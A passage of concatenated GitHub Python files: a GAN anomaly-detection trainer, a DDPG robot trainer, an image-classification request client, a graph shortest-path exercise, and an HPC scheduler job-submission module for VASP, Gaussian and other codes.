use_mbstddev=True).cuda()\n self.latent_dis = LatentDiscriminator(\n input_dim=self.latent_dim * self.latent_res * self.latent_res,\n inner_dims=config['latent_dis']).cuda()\n\n if self.verbose:\n print(\"====================== Generator ===========================\")\n 
print(self.gen)\n print(\"====================== Image discriminator ===================\")\n print(self.image_dis)\n print(\"====================== Encoder =============================\")\n print(self.enc)\n print(\"====================== Latent discriminator================\")\n print(self.latent_dis)\n\n \"=========================================== create losses ====================================================\"\n\n image_adv_loss = WassersteinLoss(**config['wasserstein_loss_kwargs'])\n latent_adv_loss = WassersteinLoss(**config['wasserstein_loss_kwargs'])\n res_loss = PerceptualLoss(**config['perceptual_loss_kwargs'], reduction='mean')\n\n \"=========================================== create optimizers ================================================\"\n\n self.optimizer = Optimizer(\n gen_params=self.gen.parameters(),\n enc_params=self.enc.parameters(),\n image_dis_params=self.image_dis.parameters(),\n latent_dis_params=self.latent_dis.parameters(),\n image_adv_loss=image_adv_loss,\n latent_adv_loss=latent_adv_loss,\n rec_loss=res_loss,\n adam_kwargs=config['adam_kwargs'],\n enc_rec_loss_weight=config['enc_rec_loss_weight'],\n gen_rec_loss_weight=config['gen_rec_loss_weight'],\n use_grad_norm_policy=config['use_grad_norm_policy']\n ).cuda()\n\n \"=========================================== data for logging =================================================\"\n\n self.n_image_for_visualization = 5\n self.display_z = next(self.latent_model)[:self.n_image_for_visualization].cpu().detach()\n self.display_x = next(self.image_model)[:self.n_image_for_visualization].cpu().detach()\n\n \"=========================================== initialize =======================================================\"\n\n self.tqdm_logger = tqdm.tqdm(total=self.iters)\n\n if config['finetune_from'] is not None:\n self.load_state(torch.load(config['finetune_from']))\n\n def train(self):\n while self.tqdm_logger.n < self.tqdm_logger.total:\n self.tqdm_logger.update(1)\n\n \"=========================================== train step ===================================================\"\n\n for _ in range(self.n_dis):\n real_z = next(self.latent_model).cuda()\n real_x = next(self.image_model).cuda()\n fake_x = self.gen(real_z.detach())\n fake_z = self.enc(real_x)\n\n image_dis_losses = self.optimizer.compute_image_dis_loss(self.image_dis, real_x, fake_x, update_parameters=True)\n latent_dis_losses = self.optimizer.compute_latent_dis_loss(self.latent_dis, real_z, fake_z, update_parameters=True)\n\n real_z = next(self.latent_model).cuda()\n real_x = next(self.image_model).cuda()\n\n fake_x = self.gen(real_z)\n fake_z = self.enc(real_x)\n rec_x = self.gen(fake_z)\n\n gen_enc_losses = self.optimizer.compute_enc_gen_loss(\n self.enc, self.gen, self.latent_dis, self.image_dis,\n fake_x, real_x, fake_z, rec_x,\n update_parameters=True,\n logger=self.logger,\n n_iter=self.tqdm_logger.n,\n update_grads=self._if_time_to_react(self.update_grad_norm_iter)\n )\n\n del real_z, real_x, fake_z, fake_x, rec_x\n\n \"============================================== logging ===================================================\"\n\n if self._if_time_to_react(self.log_iter):\n self.logger.add_scalars('train/image_dis', image_dis_losses, self.tqdm_logger.n)\n self.logger.add_scalars('train/latent_dis', latent_dis_losses, self.tqdm_logger.n)\n self.logger.add_scalars('train/gen_enc', gen_enc_losses, self.tqdm_logger.n)\n\n if self._if_time_to_react(self.image_sample_iter):\n self._save_image_sample()\n\n 
\"============================================ checkpoint ==================================================\"\n\n if self._if_time_to_react(self.checkpoint_iter):\n self._do_checkpoint()\n\n self._do_checkpoint()\n\n def get_state(self):\n return {\n 'config': self.config,\n 'n_iter': self.tqdm_logger.n,\n 'gen': self.gen.state_dict(),\n 'enc': self.enc.state_dict(),\n 'latent_dis': self.latent_dis.state_dict(),\n 'image_dis': self.image_dis.state_dict(),\n 'optimizer': self.optimizer.state_dict(),\n 'display_z': self.display_z.data,\n 'display_x': self.display_x.data,\n }\n\n def load_state(self, state):\n self.display_z.data = state['display_z']\n self.display_x.data = state['display_x']\n\n self.gen.load_model_state(state['gen'])\n self.enc.load_model_state(state['enc'])\n self.latent_dis.load_model_state(state['latent_dis'])\n self.image_dis.load_model_state(state['image_dis'])\n self.optimizer.load_opt_state(state['optimizer'])\n\n self.tqdm_logger.update(state['n_iter'])\n\n def _if_time_to_react(self, every_iter):\n return self.tqdm_logger.n % every_iter == 0\n\n def _do_checkpoint(self):\n os.makedirs(self.checkpoint_root, exist_ok=True)\n checkpoint_path = os.path.join(self.checkpoint_root, f'iter_{self.tqdm_logger.n:07d}.tar')\n torch.save(self.get_state(), checkpoint_path)\n\n checkpoint_path = os.path.join(self.checkpoint_root, 'latest.tar')\n torch.save(self.get_state(), checkpoint_path)\n\n def _save_image_sample(self):\n torch.set_grad_enabled(False)\n self.optimizer.eval()\n\n images = torch.cat([\n self.gen(self.display_z.cuda()).cpu().detach(),\n self.display_x,\n self.gen(self.enc(self.display_x.cuda())).cpu().detach()\n ], 0)\n\n name = f'iter_{self.tqdm_logger.n:07d}.png'\n self.logger.save_image_samples(images, grid_size=self.image_res * self.n_image_for_visualization,\n name=name, nrow=self.n_image_for_visualization)\n self.logger.save_image_samples(images, grid_size=self.image_res * self.n_image_for_visualization,\n name='sample.png', nrow=self.n_image_for_visualization)\n\n torch.set_grad_enabled(True)\n self.optimizer.train()\n\n\ndef train(config, normal_class, run):\n config['normal_class'] = normal_class\n config['run'] = run\n\n trainer = PIADTrainer(config)\n trainer.train()\n\n\ndef main():\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('config', type=str, help='Path to config')\n parser.add_argument('normal_class', type=int, help='Normal class')\n parser.add_argument('run', type=int, help='# of run')\n args = parser.parse_args()\n\n with open(args.config, 'r') as stream:\n config = yaml.load(stream, Loader=yaml.FullLoader)\n\n train(config, args.normal_class, args.run)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ninatu/piad","sub_path":"piad/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":10753,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"44"} +{"seq_id":"6361541686","text":"# -*- coding: utf-8 -*-\n\"\"\"\nPepper Train offline a Model with given training_sets.\n\"\"\"\nimport json\nimport random\nimport time\nimport tensorflow as tf\nimport numpy as np\n\nfrom Settings import *\nfrom ddpg.ddpg import ActorNetwork, CriticNetwork, OrnsteinUhlenbeckActionNoise, ReplayBuffer, build_summaries\n\n\ndef trainFromDataset(sess, args, actor, critic, actor_noise, update_model, saver):\n # Set up summary Ops\n summary_ops, summary_vars = build_summaries()\n\n if update_model == False:\n 
sess.run(tf.global_variables_initializer())\n # Initialize target network weights\n actor.update_target_network()\n critic.update_target_network()\n\n writer = tf.summary.FileWriter(args['summary_dir'], sess.graph)\n # Initialize replay memory\n replay_buffer = ReplayBuffer(int(args['buffer_size']), int(args['random_seed']))\n file = open(TRAINING_FILE)\n datasets = json.load(file)['steps']\n file.close()\n\n for i in range(int(args['max_episodes'])):\n ep_reward = 0\n ep_ave_max_q = 0\n startTime = time.clock()\n for j in range(int(args['max_episode_len'])):\n\n randomnumber = random.randint(0, len(datasets) - 1)\n p = datasets[randomnumber]\n s = [p['az'], p['ad']]\n a = p['actionR']\n s2 = [p['fz'], p['fd']]\n r = p['rw']\n replay_buffer.add(np.reshape(s, (actor.s_dim,)), np.reshape(a, (actor.a_dim,)), r,\n False, np.reshape(s2, (actor.s_dim,)))\n\n # Keep adding experience to the memory until\n # there are at least minibatch size samples\n if replay_buffer.size() > int(args['minibatch_size']):\n s_batch, a_batch, r_batch, t_batch, s2_batch = \\\n replay_buffer.sample_batch(int(args['minibatch_size']))\n\n # Calculate targets\n target_q = critic.predict_target(\n s2_batch, actor.predict_target(s2_batch))\n\n y_i = []\n for k in range(int(args['minibatch_size'])):\n if t_batch[k]:\n y_i.append(r_batch[k])\n else:\n y_i.append(r_batch[k] + critic.gamma * target_q[k])\n\n # Update the critic given the targets\n predicted_q_value, _ = critic.train(\n s_batch, a_batch, np.reshape(y_i, (int(args['minibatch_size']), 1)))\n\n ep_ave_max_q += np.amax(predicted_q_value)\n\n # Update the actor policy using the sampled gradient\n a_outs = actor.predict(s_batch)\n grads = critic.action_gradients(s_batch, a_outs)\n actor.train(s_batch, grads[0])\n\n # Update target networks\n actor.update_target_network()\n critic.update_target_network()\n\n ep_reward += r\n print(\"Episode: \" + str(i) + \"\\t\" + str(ep_reward / args['max_episode_len']) + \"\\tbeendet in\\t\" + str(\n time.clock() - startTime) + \"s\")\n if i % int(args['save']) == 0 and i != 0:\n print('Saving model')\n filename = args['model'] + \"_\" + str(i) + \"/model\"\n saver.save(sess, filename)\n\n\ndef main():\n print(\"Doing Offline Training\")\n with tf.Session() as sess:\n np.random.seed(int(args['random_seed']))\n tf.set_random_seed(int(args['random_seed']))\n\n actor = ActorNetwork(sess, state_dim, action_dim, action_bound,\n float(args['actor_lr']), float(args['tau']),\n int(args['minibatch_size']))\n\n critic = CriticNetwork(sess, state_dim, action_dim,\n float(args['critic_lr']), float(args['tau']),\n float(args['gamma']),\n actor.get_num_trainable_vars())\n actor_noise = OrnsteinUhlenbeckActionNoise(mu=np.zeros(action_dim))\n\n saver = tf.train.Saver()\n trainFromDataset(sess, args, actor, critic, actor_noise, False, saver)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"mhinkelmann/Pepper_RL","sub_path":"src/pepper_ddpg_offline_trainer.py","file_name":"pepper_ddpg_offline_trainer.py","file_ext":"py","file_size_in_byte":4119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"27884533057","text":"import json\nimport base64\nimport requests\nimport os\nimport pandas as pd\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\n '--port',\n type=int,\n default=8000,\n help='The port that the server is running on'\n)\nparser.add_argument(\n '--directory',\n type=str,\n default='data',\n help='The directory that stores cat and dog 
images'\n)\nargs = parser.parse_args()\n\nurl = f'http://127.0.0.1:{args.port}/predict'\ndirectory = f'./{args.directory}'\ninput = {'photos': []}\n\nfor image in os.listdir(directory):\n with open(f'{directory}/{image}', 'rb') as image_file:\n encoding = base64.b64encode(image_file.read()).decode('utf-8')\n image_dict = {'ID': image, 'img_code': encoding}\n input['photos'].append(image_dict)\n\nresponse = requests.post(url, data=json.dumps(input))\n\ndf = pd.DataFrame(response.json()['results'])\ncat_tp = 0\ndog_tp = 0\nfor i in df.index:\n if df['ID'][i].split('.')[0] == 'cat' and df['cat_prob'][i] >= 0.5:\n cat_tp += 1\n if df['ID'][i].split('.')[0] == 'dog' and df['dog_prob'][i] > 0.5:\n dog_tp += 1\ntp = pd.DataFrame({'cat_tp': [cat_tp], 'dog_tp': [dog_tp]})\n\nwriter = pd.ExcelWriter('./analysis.xlsx', engine='xlsxwriter')\ndf.to_excel(writer, sheet_name='Probabilities', index=False)\ntp.to_excel(writer, sheet_name='Analysis', index=False)\nwriter.close()","repo_name":"dimitlee/CatDog","sub_path":"request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"40786752045","text":"from kol2btesty import runtests\nimport heapq\ndef min_cost( O, C, T, L ):\n \n # tu prosze wpisac wlasna implementacje\n cost_on_parking = {}\n\n for i in range(len(O)):\n cost_on_parking[O[i]] = C[i] \n O.sort()\n G = {elem:[] for elem in O}\n A =0 \n\n G[A] = [] #punkt startowy!\n G[L] = [] #punkt koncowy\n i = 0 \n while i < len(O) and O[i] <=T:\n G[A].append((O[i],cost_on_parking[O[i]],0)) #0 na koncu oznacza ze nie wykorzystany zostal dodatkowy warunek\n i+=1\n while i < len(O) and O[i] <= 2*T:\n G[A].append((O[i],cost_on_parking[O[i]],1)) #1 na koncu oznacza ze wykorzystany zostal dodatkowy warunek\n i+=1\n if L < T:\n G[A].append((L,0,0))\n elif L < 2*T:\n G[A].append((L,0,1))\n \n for ind,elem in enumerate(O):\n i = ind+1\n while i < len(O) and O[i] - elem <=T:\n G[elem].append((O[i],cost_on_parking[O[i]],0)) #0 na koncu oznacza ze nie wykorzystany zostal dodatkowy warunek\n i+=1\n while i < len(O) and O[i] - elem <= 2*T:\n G[elem].append((O[i],cost_on_parking[O[i]],1)) #1 na koncu oznacza ze wykorzystany zostal dodatkowy warunek\n i+=1\n if L - elem < T:\n G[elem].append((L,0,0))\n elif L - elem <= 2*T:\n G[elem].append((L,0,1))\n \n\n dist = {elem:[float(\"inf\"),float(\"inf\")] for elem in G}\n dist[A][0] = 0\n visited = {elem:[False,False] for elem in G}\n q = [(0,A,0)] #(dist,A,0) # 0 oznacza ze nie wykorzystalismy krawedzi 2T\n # jesli flag == 1 to wykorzystana zostala juz krawedz 2T\n # czyli teraz juz bedziemy musieli zawsze utrzymywac flagę flag == 1 przy dodawaniu wierzcholkow do kolejki\n while q:\n cost,u,flag = heapq.heappop(q)\n if visited[u][flag]:continue\n visited[u][flag] = True\n for v,w,f in G[u]:\n if f == 0: #ten przypadek jest dla dowolnej naszej flagi \n if flag == 1:\n if dist[u][1] + w < dist[v][1]:\n dist[v][1] = dist[u][1] + w\n heapq.heappush(q,(dist[v][1],v,1)) #dodajemy flag zamiast f gdyz, jesli flag == 1 to \n # musimy przekazac flag == 1 tez do kolejki! 
a jesli flag == 0 no to tutaj tez dajemy flag == 1\n else:\n if dist[u][0] + w < dist[v][0]:\n dist[v][0] = dist[u][0] + w\n heapq.heappush(q,(dist[v][0],v,0))\n \n\n elif flag == 0: #jesli f == 1 oraz nie wykorzystalismy jeszcze krawedzi czyli flag == 0, to mozemy ją tutaj wykorzystac\n if dist[u][0] + w < dist[v][1]:\n dist[v][1] = dist[u][0] + w\n heapq.heappush(q,(dist[v][1],v,1)) #dodajemy 1 bo wykorzystalismy w tej chwili krawedz! \n \n return min(dist[L][1], dist[L][0])\n\n#zmien all_tests na True zeby uruchomic wszystkie testy\nruntests( min_cost, all_tests = True )\n","repo_name":"Adam0s007/DSA","sub_path":"tests-2022/kol2_b_dynamic/kol2b.py","file_name":"kol2b.py","file_ext":"py","file_size_in_byte":2983,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"8527631910","text":"import os, sys\nfrom subprocess import call as shl\nfrom collections import OrderedDict\nimport yaml\nimport time\ndef represent_dictionary_order(self, dict_data):\n return self.represent_mapping('tag:yaml.org,2002:map', dict_data.items())\nyaml.add_representer(OrderedDict, represent_dictionary_order)\n\n# -- version chk\nversion = sys.version\nif version[0] == '3':\n raw_input = input\n\n# -------------------- Config ---------------------#\n\"\"\"\nUp to own HPC system\n\"\"\"\n\nSGE_submit_file_framework = \"\"\"#!/bin/csh\n#$ -q {qname}\n#$ -N {jobname}\n#$ -pe mpi_{ncpu} {ncpu}\n#$ -V\n#$ -cwd\n\"\"\"\n\nPBS_submit_file_framework = \"\"\"#!/bin/sh -x\n#PBS -l select={nselect}:ncpus={ncpu}:mpiprocs={ncpu}:Qlist=vasp\n#PBS -q {qname}\n#PBS -N {jobname}\n\ncd $PBS_O_WORKDIR\n\nnodes=`cat $PBS_NODEFILE` # Nodes in job\n\njobidcut=`echo $PBS_JOBID|cut -d. -f1`\n bhosts=bhosts\n lamhosts=lamhosts\n rm -f $bhosts\n rm -f $lamhosts.*\n #Need to truncate anything after a '.'\n nodes=`echo $nodes | sed 's/\\.\\w*//g'`\n for node in $nodes; do\n nodecut=`echo $node|cut -d- -f1`\n echo \"$nodecut slots=${{NCPUS}}\" >> $bhosts\n done\n\nsource /opt/intel/oneapi/setvars.sh\nexport LD_LIBRARY_PATH=/usr/apps/openmpi_1_8/lib:/usr/apps/fftw-2.1.5/double/lib:$LD_LIBRARY_PATH\nexport PATH=/opt/intel/oneapi/mpi/2021.4.0/bin:$PATH\nNP=`/usr/bin/wc -l $PBS_NODEFILE | awk '{{ print $1 }}'`\n\"\"\" \n\nSlurm_submit_file_framework = \"\"\n\nclass JobSubmit:\n def __init__(self, inputfile, queue, n_of_cpu, node=None, init_only=False):\n self.inputfile = inputfile\n home = os.getenv(\"HOME\")\n # -- read configs from queue_config.yaml\n user_queue_config = f\"{home}/.CCpy/queue_config.yaml\"\n if not os.path.isfile(user_queue_config):\n from pathlib import Path\n MODULE_DIR = Path(__file__).resolve().parent\n default_queue_config = str(MODULE_DIR) + \"/queue_config.yaml\"\n if \".CCpy\" not in os.listdir(home):\n os.mkdir(f\"{home}/.CCpy\")\n os.system(f\"cp {default_queue_config} {user_queue_config}\")\n\n if init_only:\n return\n\n yaml_string = open(user_queue_config, \"r\").read()\n queue_config = yaml.load(yaml_string)\n self.queue_config = queue_config\n \n\n # -- Queue and nodes settings\n try:\n CCpy_SCHEDULER_CONFIG = os.environ['CCpy_SCHEDULER_CONFIG']\n except:\n print('''Error while load $CCpy_SCHEDULER_CONFIG file.\n Please check the example of scheduler config file at https://github.com/91bsjun/CCpy/tree/master/CCpy/Queue''')\n quit()\n scheduler_config = yaml.load(open(CCpy_SCHEDULER_CONFIG, 'r'))\n\n if queue not in scheduler_config['queue'].keys():\n print(f\"'{queue}' queue argument is not in queue configuration file ({CCpy_SCHEDULER_CONFIG}), \\nCurrent 
available:\", list(scheduler_config['queue'].keys()))\n quit()\n\n cpu = scheduler_config['queue'][queue]['ncpu']\n mem = scheduler_config['queue'][queue]['mem']\n q = scheduler_config['queue'][queue]['q_name']\n\n self.cpu = cpu\n self.mem = mem\n self.q = q\n self.n_of_nodes = 1 # select multi nodes\n if n_of_cpu:\n self.n_of_cpu = n_of_cpu\n else:\n self.n_of_cpu = cpu\n self.divided = cpu / self.n_of_cpu\n if self.n_of_cpu > cpu: # select multi nodes\n self.n_of_nodes = int(self.n_of_cpu / cpu) # select multi nodes\n\n self.qsub = queue_config['qsub']\n\n self.python_path = queue_config['python_path']\n self.mpi_run = queue_config['mpi_run']\n\n self.atk_mpi_run = queue_config['atk_mpi_run']\n\n self.vasp_path = queue_config['vasp_path']\n# >>>>>>>>>>>>>>>>>>>>>>> !!! modify below line up to your system !!! <<<<<<<<<<<<<<<<<<<<<<<<< #\n self.vasp_run = f\"{self.mpi_run} -launcher rsh -np $NP -machinefile $PBS_NODEFILE {self.vasp_path} < /dev/null > vasp.out\" # !!!! <-- HMC vasp run type\n # self.vasp_run = f\"{self.mpi_run} -np $NSLOTS {self.vasp_path} < /dev/null > vasp.out\" # !!!! <-- CMS vasp run type\n\n self.g09_path = queue_config['g09_path']\n self.atk_path = queue_config['atk_path']\n\n self.lammps_mpirun_path = self.mpi_run\n self.lammps_path = queue_config['lammps_path']\n \n self.siesta_path = queue_config['siesta_path']\n\n # -- queue settings\n #self.pe_request = \"#$ -pe mpi_%d %d\" % (self.n_of_cpu, self.n_of_cpu)\n #self.queue_name = \"#$ -q %s\" % self.q if self.q else \"\"\n\n self.scheduler_type = scheduler_config['scheduler_type']\n\n if self.scheduler_type == \"PBS\":\n mpi = PBS_submit_file_framework\n elif self.scheduler_type == \"SGE\":\n mpi = SGE_submit_file_framework\n elif self.scheduler_type == \"Slurm\":\n mpi = Slurm_submit_file_framework\n\n if node and self.scheduler_type == \"SGE\":\n mpi += f\"#$ -l h={node}\\n\"\n \n self.mpi = mpi\n \n \n\n def gaussian(self, ):\n inputfile = self.inputfile\n cpu, mem, q = self.n_of_cpu, self.mem, self.q\n d = self.divided\n\n mem = int(mem / d)\n\n f = open(inputfile, \"r\")\n lines = f.readlines()\n f.close()\n\n f = open(inputfile, \"w\")\n for line in lines:\n if \"%nproc=\" in line:\n f.write(\"%nproc=\" + str(cpu) + \"\\n\")\n elif \"%mem=\" in line:\n f.write(\"%mem=\" + str(mem) + \"Gb\\n\")\n else:\n f.write(line)\n f.close()\n\n jobname = \"G\" + inputfile.replace(\".com\", \"\")\n jobname = jobname.replace(\".\", \"_\").replace(\"-\", \"_\")\n\n if self.scheduler_type == \"PBS\":\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.cpu, nselect=self.n_of_nodes)\n else:\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.cpu)\n mpi += f\"{self.g09_path} {inputfile}\\n\"\n\n f = open(\"mpi.sh\", \"w\")\n f.write(mpi)\n f.close()\n\n shl(self.qsub + \" mpi.sh\", shell=True)\n shl(\"rm -rf ./mpi.sh\", shell=True)\n\n def gaussian_batch(self, input_files):\n cpu, mem, q = self.n_of_cpu, self.mem, self.q\n d = self.divided\n\n mem = int(mem / d)\n\n for inputfile in input_files:\n f = open(inputfile, \"r\")\n lines = f.readlines()\n f.close()\n\n f = open(inputfile, \"w\")\n for line in lines:\n if \"%nproc=\" in line:\n f.write(\"%nproc=\" + str(cpu) + \"\\n\")\n elif \"%mem=\" in line:\n f.write(\"%mem=\" + str(mem) + \"Gb\\n\")\n else:\n f.write(line)\n f.close()\n\n jobname = raw_input(\"Jobname for this job \\n: \")\n runs = \"\"\n for each_input in input_files:\n runs += \"%s %s\\nsleep 10\\n\" % (self.g09_path, each_input)\n\n if self.scheduler_type == \"PBS\":\n mpi = 
self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.cpu, nselect=self.n_of_nodes)\n else:\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.cpu)\n mpi += runs\n\n mpi_filename = \"mpi_%s.sh\" % jobname\n f = open(mpi_filename, \"w\")\n f.write(mpi)\n f.close()\n\n shl(self.qsub + \" %s\" % mpi_filename, shell=True)\n shl(\"rm -rf ./mpi.sh\", shell=True)\n\n\n def vasp(self, band=False, dirpath=None, loop=False, sequence=False, refine_poscar=False):\n inputfile = self.inputfile\n\n #vasp_run = self.vasp_run\n # -- Band calculation after previous calculation\n if band:\n jobname = \"VB\" + inputfile\n elif loop:\n from pathlib import Path\n MODULE_DIR = Path(__file__).resolve().parent\n loop_opt_script = str(MODULE_DIR) + \"/../Package/VASPOptLoop.py\"\n os.system(f'cp {loop_opt_script} ./.VASPOptLoop.py')\n script_filename = \".VASPOptLoop.py\"\n script_path = os.getcwd() + \"/\" + script_filename\n # self.vasp_run = \"%s %s\\nrm %s\" % (self.python_path, script_path, script_path)\n self.vasp_run = f\"{self.python_path} {script_path}\"\n jobname = \"VL\" + inputfile\n elif sequence:\n from pathlib import Path\n MODULE_DIR = Path(__file__).resolve().parent\n sequence_job_script = str(MODULE_DIR) + \"/../Package/VASPSequenceJobs.py\"\n os.system(f'cp {sequence_job_script} ./.VASPSequenceJobs.py')\n script_filename = \".VASPSequenceJobs.py\"\n script_path = os.getcwd() + \"/\" + script_filename\n \n sequence_file = sequence\n\n loop_opt_script = str(MODULE_DIR) + \"/../Package/VASPOptLoop.py\"\n os.system(f'cp {loop_opt_script} ./.VASPOptLoop.py')\n loop_opt_script_filename = \".VASPOptLoop.py\"\n loop_opt_script_path = os.getcwd() + \"/\" + loop_opt_script_filename\n \n self.vasp_run = f\"{self.python_path} {script_path} {inputfile} {sequence_file} {self.python_path} {loop_opt_script_path} {refine_poscar}\"\n jobname = \"VLS\" + inputfile\n else:\n jobname = \"V\" + inputfile\n jobname = jobname.replace(\".\", \"_\").replace(\"-\", \"_\").replace(\"/\", \"_\").replace(\"(\", \"_\").replace(\")\", \"_\")\n \n tmp_dirpath = dirpath.replace(\"(\", \"\\(\").replace(\")\", \"\\)\")\n\n if self.scheduler_type == \"PBS\":\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.cpu, nselect=self.n_of_nodes)\n else:\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.n_of_cpu)\n\n if not sequence:\n mpi += f\"cd {tmp_dirpath} \\n\"\n mpi += f\"{self.vasp_run}\\n\"\n mpi += \"touch vasp.done \\n\"\n\n pwd = os.getcwd()\n os.chdir(dirpath)\n if 'vasp.done' in os.listdir():\n os.remove('vasp.done')\n else:\n mpi += f\"{self.vasp_run}\\n\"\n mpi_filename = f\"mpi_{jobname}.sh\"\n f = open(mpi_filename, \"w\")\n f.write(mpi)\n f.close()\n shl(f\"{self.qsub} {mpi_filename}\", shell=True)\n time.sleep(0.5)\n #shl(\"rm -rf ./%s\" % mpi_filename, shell=True)\n #os.chdir(pwd)\n\n def vasp_batch(self, dirs=None, scratch=False, loop=False, jobname=None, sequence=False, refine_poscar=False):\n \"\"\"\n Run multiple VASP jobs in a single queue\n \"\"\"\n if not jobname:\n jobname = raw_input(\"Jobname for this job \\n: \")\n\n runs = \"\"\n script_path = None\n\n pwd = os.getcwd()\n if loop:\n from pathlib import Path\n MODULE_DIR = Path(__file__).resolve().parent\n loop_opt_script = str(MODULE_DIR) + \"/../Package/VASPOptLoop.py\"\n os.system(f'cp {loop_opt_script} ./.VASPOptLoop.py')\n script_filename = \".VASPOptLoop.py\"\n script_path = os.getcwd() + \"/\" + script_filename\n each_run = f\"{self.python_path} {script_path}\\n\"\n each_run += \"touch vasp.done\\n\"\n 
each_run += \"sleep 30\\n\"\n elif sequence:\n from pathlib import Path\n MODULE_DIR = Path(__file__).resolve().parent\n sequence_job_script = str(MODULE_DIR) + \"/../Package/VASPSequenceJobs.py\"\n os.system(f'cp {sequence_job_script} ./.VASPSequenceJobs.py')\n script_filename = \".VASPSequenceJobs.py\"\n script_path = os.getcwd() + \"/\" + script_filename\n sequence_file = sequence\n\n loop_opt_script = str(MODULE_DIR) + \"/../Package/VASPOptLoop.py\"\n os.system(f'cp {loop_opt_script} ./.VASPOptLoop.py')\n loop_opt_script_filename = \".VASPOptLoop.py\"\n loop_opt_script_path = os.getcwd() + \"/\" + loop_opt_script_filename \n else:\n each_run = f\"{self.vasp_run}\\n\"\n each_run += \"touch vasp.done\\n\"\n each_run += \"sleep 30\\n\" \n \n for d in dirs:\n # if use scratch, copy input to /scratch/vasp and run job in that dir,\n # when finished, copy to original working directory\n # scratch is recommended when perform small jobs\n if not sequence:\n os.chdir(d)\n d = d.replace(\"(\", \"\\(\").replace(\")\", \"\\)\")\n if 'vasp.done' in os.listdir():\n os.remove('vasp.done')\n os.chdir(pwd)\n if scratch:\n dir_path = \"/scratch/vasp\" + d\n runs += \"mkdir -p \" + dir_path + \"\\n\" # make dir under /scratch/vasp\n runs += \"cp \" + d + \"/* \" + dir_path + \"\\n\" # copy original to /scratch/vasp\n runs += \"cd \" + dir_path + \"\\n\" # chg dir to /scratch/vasp\n runs += each_run + \"\\n\" # run vasp\n runs += \"cp \" + dir_path + \"/* \" + d + \"\\n\" # copy finished job to original dir\n runs += \"rm -rf \" + dir_path + \"\\n\\n\" # remove finished job under /scratch/vasp\n # change dir to each input and run 'each_run'\n else:\n runs += \"cd \" + d + \"\\n\"\n runs += each_run\n else:\n inputfile = d # vasp input files (d) is cif file when sequence run\n runs += f\"{self.python_path} {script_path} {inputfile} {sequence_file} {self.python_path} {loop_opt_script_path} {refine_poscar}\\n\"\n runs += \"sleep 30\\n\\n\"\n\n if self.scheduler_type == \"PBS\":\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.cpu, nselect=self.n_of_nodes)\n else:\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.n_of_cpu)\n mpi += runs\n\n pwd = os.getcwd()\n mpi_filename = f\"mpi_{jobname}.sh\"\n f = open(mpi_filename, \"w\")\n f.write(mpi)\n f.close()\n shl(f\"{self.qsub} {mpi_filename}\", shell=True)\n time.sleep(0.5)\n #shl(\"rm -rf ./%s\" % mpi_filename, shell=True)\n\n def qchem(self):\n inputfile = self.inputfile\n outputfile = inputfile.replace(\".in\", \".out\")\n\n jobname = \"Q\" + inputfile.replace(\".in\", \"\")\n jobname = jobname.replace(\".\", \"_\").replace(\"-\", \"_\")\n\n if self.scheduler_type == \"PBS\":\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.cpu, nselect=self.n_of_nodes)\n else:\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.n_of_cpu)\n mpi += \"set MPI_HOME=/opt/mpi/intel-parallel-studio2013sp1/openmpi-1.6.5\\n\"\n mpi += f\"set MPI_EXEC={self.mpi_run}\\n\\n\"\n mpi += \"setenv QCSCRATCH /scratch\\n\"\n mpi += \"setenv QCAUX /opt/QChem4.2/qcaux\\n\"\n mpi += \"source /opt/QChem4.2/qcenv.csh\\n\\n\"\n mpi += f\"qchem {inputfile} {outputfile}\\n\"\n\n f = open(\"mpi.sh\", \"w\")\n f.write(mpi)\n f.close()\n\n shl(self.qsub + \" mpi.sh\", shell=True)\n shl(\"rm -rf ./mpi.sh\", shell=True)\n\n def ATK(self, atk_version=\"atk2017\"):\n inputfile = self.inputfile\n\n jobname = \"A\" + inputfile.replace(\".py\", \"\")\n jobname = jobname.replace(\".\", \"_\").replace(\"-\", \"_\")\n outputfile = 
inputfile.replace(\".py\", \".out\")\n\n if self.scheduler_type == \"PBS\":\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.cpu, nselect=self.n_of_nodes)\n else:\n mpi = self.mpi.format(qname=self.q, jobname=jobname, ncpu=self.n_of_cpu)\n mpi += f\"set MPI_EXEC={self.atk_mpi_run}\\n\"\n mpi += \"setenv OMP_NUM_THREADS 1\\n\"\n mpi += \"setenv OMP_DYNAMIC FALSE\\n\\n\"\n mpi += \"setenv QUANTUM_LICENSE_PATH 6200@166.104.249.249\\n\\n\"\n mpi += f\"$MPI_EXEC -n {self.n_of_cpu} {self.atk_path} {inputfile} {outputfile}\\n\"\n\n f = open(\"mpi.sh\", \"w\")\n f.write(mpi)\n f.close()\n\n shl(self.qsub + \" mpi.sh\", shell=True)\n shl(\"rm -rf ./mpi.sh\", shell=True)\n\n def atat(self):\n dirname = os.getcwd()\n dirname = dirname.split(\"/\")[-1]\n\n inputfile = self.inputfile\n\n if \"/\" in inputfile and \"p+\" in inputfile:\n jobname = \"AT_\" + inputfile.split(\"/\")[-1]\n else:\n jobname = \"AT_\" + dirname + \"_\" + inputfile\n jobname = jobname.replace(\".\", \"_\").replace(\"-\", 